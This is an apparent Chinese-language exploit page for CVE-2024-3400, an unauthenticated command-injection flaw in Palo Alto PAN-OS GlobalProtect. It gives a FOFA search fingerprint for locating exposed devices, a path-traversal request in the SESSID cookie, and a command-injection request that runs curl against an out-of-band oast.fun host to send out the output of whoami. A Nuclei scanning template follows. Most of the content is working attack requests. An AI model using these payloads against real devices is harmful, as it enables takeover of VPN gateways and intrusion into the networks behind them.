## PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400)

PAN-OS安全设备是PaloAlto公司的一款VPN设备，其使管理者无论位于何处都能够通过将下一代安全平台扩展到所有用户保护网络安全。它通过应用平台的功能来了解应用程序的使用情况。它将流量与用户和设备相关联并通过下一代技术实施安全策略来保护流量。其GlobalProtect功能的login.esp接口的Cookie存在未授权远程命令执行漏洞，攻击者可通过该漏洞控制设备。

## fofa
```
icon_hash="-631559155"
```


## poc
```
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

![image](https://github.com/wy876/POC/assets/139549762/d94dec78-deb5-440c-9883-99ec1d954ebe)

## Command Injection
```
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

## CVE-2024-3400.yaml
```
id: palo-alto-networks-pan-os-command-injection
info:
  name: Palo Alto Networks PAN-OS Command Injection Vulnerability
  author: generated with pdteam AI
  severity: Critical

http:
  - method: POST
    path:
      - "{{BaseURL}}/ssl-vpn/hipreport.esp"
    headers:
      Cookie: "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;"
      Connection: "close"
      Content-Type: "application/x-www-form-urlencoded"
      Content-Length: "0"
    matchers:
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/global-protect/portal/images/poc.txt"
    matchers:
      - type: status
        status:
          - 403
```

## 漏洞来源
- https://github.com/h4x0r-dz/CVE-2024-3400